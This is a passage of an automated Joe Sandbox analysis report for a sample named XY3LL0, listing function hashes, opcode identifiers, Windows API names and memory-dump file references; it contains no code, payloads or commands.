                                                                                            • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                            • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                                                            • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                            • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleName
                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                            • API String ID: 514040917-4022980321
                                                                                            • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                            • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                                                            • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                            • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 2057259594-0
                                                                                            • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                            • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                                                            • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                            • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                                                            • String ID:
                                                                                            • API String ID: 3103264659-0
                                                                                            • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                            • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                                                            • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                            • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3140674995-0
                                                                                            • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                            • Instruction ID: a7a383041ce5d6d9453c6b73a55f10248bd6e75208f40a919480d779e3608ac3
                                                                                            • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                            • Instruction Fuzzy Hash: FA311D73B09B818AEB608F60E840BE97365FB54794F44503ADB5E87B94EF38D548C750
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1269745586-0
                                                                                            • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                            • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                                                            • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                            • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1239891234-0
                                                                                            • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                            • Instruction ID: 902b24464620716174ac855a7d2f3b3ce560c1833a18ca9a9564acf6e4568a07
                                                                                            • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                            • Instruction Fuzzy Hash: AF317F33A18B8189DB60CF24E8407AE33A4FB957A4F544135EBAE43B99EF38D145CB40
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                            • String ID:
                                                                                            • API String ID: 1445889803-0
                                                                                            • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                            • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                                                            • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                            • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                                                            • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1617791916-0
                                                                                            • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                            • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                                                            • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                            • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                                            • String ID:
                                                                                            • API String ID: 2202868296-0
                                                                                            • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                            • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                                                            • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                            • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                            • String ID:
                                                                                            • API String ID: 15204871-0
                                                                                            • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                            • Instruction ID: 95f8310ae18c6caccb4f20e721af6a604ca8ec1263f71465f5c3f48c82d628cc
                                                                                            • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                            • Instruction Fuzzy Hash: 92B16A73604B8A8FEB15CF29D88676C3BA0F744B98F148921DB6E837A8DB39D451D740
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharErrorLastMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 203985260-0
                                                                                            • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                            • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                                                            • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                            • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                            • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                                                            • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                            • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                            • Instruction ID: c00914cdefede2bf6d7f4af893e38384b7383a95087b7509f83b17a476d6e7e0
                                                                                            • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                            • Instruction Fuzzy Hash: 0E51F723F0868189FB209B76AC449AA7BA0FB507E4F144135EF6E27AD9EE3CD441C741
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: EntryFunctionLookup
                                                                                            • String ID:
                                                                                            • API String ID: 3852435196-0
                                                                                            • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                            • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                                                            • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                            • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                                            • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                                                            • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                                            • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                                            • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                                                            • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                                            • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -
                                                                                            • API String ID: 0-2547889144
                                                                                            • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                                            • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                                                            • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                                            • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -
                                                                                            • API String ID: 0-2547889144
                                                                                            • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                                            • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                                                            • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                                            • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                            • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                                                            • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                            • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -
                                                                                            • API String ID: 0-2547889144
                                                                                            • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                                            • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                                                            • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                                            • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
